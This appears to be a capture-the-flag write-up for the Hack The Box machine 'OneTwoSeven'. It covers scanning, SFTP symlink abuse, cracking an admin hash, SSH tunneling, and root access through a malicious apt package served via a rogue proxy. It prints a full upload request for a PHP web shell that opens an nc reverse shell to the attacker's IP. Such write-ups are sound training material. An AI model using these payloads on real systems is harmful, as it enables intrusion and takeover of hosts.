OneTwoSeven

nmap -sC -sV -oA nmap/onetwoseven.htb 10.10.10.133

# Nmap 7.70 scan initiated Wed Apr 24 15:36:04 2019 as: nmap -Pn -sC -sV -oA nmap/onetwoseven 10.10.10.133
Nmap scan report for 10.10.10.133
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10*deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 48:6c:93:34:16:58:05:eb:9a:e5:5b:96:b6:d5:14:aa (RSA)
|   256 32:b7:f3:e2:6d:ac:94:3e:6f:11:d8:05:b9:69:58:45 (ECDSA)
|_  256 35:52:04:dc:32:69:1a:b7:52:76:06:e3:6c:17:1e:ad (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Page moved.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 24 15:37:22 2019 -- 1 IP address (1 host up) scanned in 77.43 seconds

SFTP

we found a sftp login credentials on port 80 enumeration.

Username: ots-kMjNlZjE
Password: a6d23ef1

lets login in with command

sftp ots-kMjNlZjE@10.10.10.133

After some web searching and some experimenting we find that we can create sysmlnks and apache (which has more privleges that sftp will open them in url http://10.10.10.133/ots-kMjNlZjE/ . so create a syslnk of root directory with name nice

sysmlnk root /

Opening it in web browser at url http://10.10.10.133/ots-kMjNlZjE/root .

Web Exploitation

Obtaining hash

On browsing the the url http://10.10.10.133/ots-kMjNlZjE/root , we find a file login.php.swp. Its a vim backup file, on viewing it, we get. a hash and of user ots-admin.

ots-admin
11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8 

Cracking hash

Crack it with john (pass.hash is file only containing hash)

john --wordlist=rockyou.txt pass.hash

we get password as Homesweethome1

SSH tunneling

Further exploring the source code we get a admin login at localhost:60080 of the remote machine. Using ssh tunneling to tunnel our localhost:60080 to remote machine localhost:60080

ssh -N -L 60080:127.0.0.1:60080 ots-kMjNlZjE@10.10.10.133

~we can do this as sftp is bases on ssh

Shell Upload

We get a login prompt after which we get a menu.php, with several php addons. After some enumeration and reading ots-addon-man, we upload reverse shell as following request. ~i use python for creating this request.

POST /addon-download.php/addon-upload.php HTTP/1.1
Host: 127.0.0.1:60080
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml*xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1805684181392670424798019532
Content-Length: 540
DNT: 1
Connection: close
Cookie: PHPSESSID=95bpafranr5ugmd7sh8b2895p5
Upgrade-Insecure-Requests: 1

-----------------------------1805684181392670424798019532
Content-Disposition: form-data; name="addon"; filename="ots-nice.php"
Content-Type: application/x-php

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /login.php"); }; if ( strpos($_SERVER['REQUEST_URI'], '/addons/') !== false ) { die(); };
# OneTwoSeven Admin Plugin
# OTS SHELL
echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.39 4444 >/tmp/f");
?>

-----------------------------1805684181392670424798019532--

Privelge Escalation

~I used LinEnum.sh as enumeration script

As result of command sudo -l we find that we run apt-get update && apt-get upgrade and change environment variable http_proxy, so apt is our attack vector. on internet we find an apt mitm (man in the middle) vuln, so did the following steps.

1. Follow the blog post make the malicious deb file, Package file.

   we will only need these file you can ignore the rest of blog.

2. Create the repo stucture,

.:
devuan

./devuan:
dists  pool

./devuan/dists:
ascii

./devuan/dists/ascii:
main

./devuan/dists/ascii/main:
binary-amd64

./devuan/dists/ascii/main/binary-amd64:
Packages

./devuan/pool:
main

./devuan/pool/main:
v

./devuan/pool/main/v:
vim

./devuan/pool/main/v/vim:
vim_11.1.0875-3_amd64.deb

3. Make the box proxy to us,

export http_proxy=http://10.10.15.69:3128/

4. Proxy to a Proxy

• the box proxies to a proxy on our box, the proxy tunnels locally to port 80. ~we doing this so the second proxy uses our /etc/hosts to resolve packages.onetwoseven.htb to 127.0.0.1.
• we will use squid to listen on port 3128 (i.e default), which will forward it localhost listening on port 80
• Make appropriate changes to /etc/squid/squid.conf allow connections only to localhost host, otherwise the target box will be updated which is not good.
• Add this to squid.conf

acl GOOD dst 127.0.0.1
 http_access allow GOOD
 http_access deny all

• Run the command to start squid service

sudo service squid start

5. Setting Up Server

• Edit the /etc/hosts file

127.0.0.1 packages.onetwoseven.htb

• Start the HTTP Server on Port 80

sudo python -m SimpleHTTPServer 80

Getting root shell,

Now all you gotta do is update and upgrade the box, which update your malicious deb package, thus giving you root shell.